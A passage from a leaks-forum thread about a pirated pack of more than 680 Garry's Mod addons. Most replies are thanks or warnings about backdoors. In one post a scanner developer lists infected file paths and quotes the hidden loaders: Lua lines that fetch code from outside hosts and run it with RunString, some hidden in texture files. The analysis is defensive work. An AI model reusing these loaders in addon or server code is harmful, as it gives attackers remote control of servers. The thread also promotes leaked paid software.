Garry's Mod Leaks

[LEAK][MEGA - PACK] 680+ ADDON PACK

Submitted by Emilywilles, , Thread ID: 239535

Thread Closed

RE: [LEAK][MEGA - PACK] 680+ ADDON PACK

#51
Thank you for sharing this!

RE: [LEAK][MEGA - PACK] 680+ ADDON PACK

Warned
#52
Thank you for sharing this!

RE: [LEAK][MEGA - PACK] 680+ ADDON PACK

#53
So Good. Lot of backdoors!!!

RE: [LEAK][MEGA - PACK] 680+ ADDON PACK

#54
Is it worth it? Most likely a lot of backdoors

RE: [LEAK][MEGA - PACK] 680+ ADDON PACK

#55
Thanks for mega pack! I'm hoping these are all valid and still working, yeah? Seeing a lot of people comment on the backdoors

RE: [LEAK][MEGA - PACK] 680+ ADDON PACK

This post was last modified: 14-05-2022, 06:12 AM by xalalau
#56
I also wrote this message in a repost of this pack (https://nulledbb.com/thread-LEAK-MEGA-PA...ADDON-PACK).


Ok. I develop an addon called Backdoor Shield and I ran this pack through its file scanner (command bs_scall_full). These were the results summary:

Quote: Files scanned: 42559

Detections:
| High-Risk : 49
| Medium-Risk : 107
| Low-Risk : 458
| Discarded : 6986

Saved as: data/backdoor-shield/Scan_2022-05-11_(22h 50m 50s).txt

After analyzing the output I found these backdoors:

Quote:addons/isolated/Advanced Kevlar System 1.0.1/cpk/lua/autorun/server/cpk_core.lua
addons/isolated/cpk/lua/autorun/server/cpk_core.lua
http.Fetch("http://230w2zy3dv.ga/loader.php",function(_)RunString(_,"",!!1)end)

addons/isolated/advanced_medic_mod/lua/autorun/sh_medicmod_loader.lua
addons/isolated/advanced_medic_mod_wdrm/lua/autorun/sh_medicmod_loader.lua
The entire file, they are the same (Update: decoded, it's a DRM)

addons/isolated/areamanager/lua/areamanager/_statistics.lua
The entire file (Update: decoded, it's a DRM)

addons/isolated/eprotect_1.3.10/lua/e_protect/client/cl_utils.lua
The entire file (Update: decoded, it's a DRM)

addons/isolated/simple-afk-system/lua/autorun/server/npc_help.lua
addons/isolated/mechanical_system/lua/autorun/server/npc_help.lua
addons/isolated/opti/lua/autorun/server/npc_help.lua
The entire files, they are the same

addons/isolated/precision-tool/lua/weapons/gmod_tool/stools/precision.lua
timer.Simple(1, function() http.Fetch("https://gvac.cz/link/fuck.php?key=djItuMLNOSYFaOTavYs3", function(b) RunString(b, ":", false) end)end)

addons/isolated/production_acier/lua/autorun/sh_loadacier.lua
timer.Simple(1, function() http.Fetch("https://gvac.cz/link/fuck.php?key=zIye1U7eyoSAcnWZfopr", function(b) RunString(b, ":", false) end)end)

addons/isolated/GMOD PACK/zeros_vendingmachines/materials/npc/help.vtf
addons/isolated/mechanical_system/materials/npc/help.vtf
addons/isolated/opti/materials/npc/help.vtf
addons/isolated/simple-afk-system/materials/npc/help.vtf
addons/isolated/zeros_vendingmachines/materials/npc/help.vtf
timer.Simple(1, function() http.Fetch("https://gvac.cz/link/fuck.php?key=HnHwSrtk9AG491as0D41", function(b) RunString(b, ":", false) end) end)
timer.Simple(1, function() http.Fetch("https://gvac.cz/link/fuck.php?key=nYtcUboSez0wEzapWE8H", function(b) RunString(b, ":", false) end) end)
timer.Simple(1, function() http.Fetch("https://gvac.cz/link/fuck.php?key=zIye1U7eyoSAcnWZfopr", function(b) RunString(b, ":", false) end) end)
timer.Simple(1, function() http.Fetch("https://gvac.cz/link/fuck.php?key=GIEimqvKTPpXM9S0yQBl", function(b) RunString(b, ":", false) end) end)

The "npc_help.lua" and "http.Fetch" groups are a little simpler because they are self contained and easier to read, so I don't have much to say about them, but I'm interested in decoding others (especially "cl_utils.lua" since it's clientside only).

If some of you want test BS (aka bullshit detector - https://github.com/Xalalau/backdoor-shield), consider that the file scanner can be avoided by backdoors with some tactics, so also execute the infected addons along with Shield to make use of the real-time protection - which blocks suspicious calls, traces their locations and even copies the malicious code to a log.

I hope I've found most of the "issues", but if anything new and cool comes up, let me know - It's much easier to develop this thing by reading the targets' code. In fact, I'm here just for that, I don't like software piracy.

RE: [LEAK][MEGA - PACK] 680+ ADDON PACK

#57
Yeah its defo got backdoors

RE: [LEAK][MEGA - PACK] 680+ ADDON PACK

#58
26-04-2022, 11:34 PM
Poggerskekw Wrote:
judging from your posts, you never posted a big pack
I leaked watch my profile threads this is my pack!

RE: [LEAK][MEGA - PACK] 680+ ADDON PACK

#59
https://github.com/orgs/In-memory-of-COD...s?type=all

Just go there if you are looking for code blues stuff. No need to try and gain credits of already free addons (good free addons may I add) lol.

RE: [LEAK][MEGA - PACK] 680+ ADDON PACK

#60
Thats a good addon's, i go to revise all addons with Void!, thanks :D

Users browsing this thread: 1 Guest(s)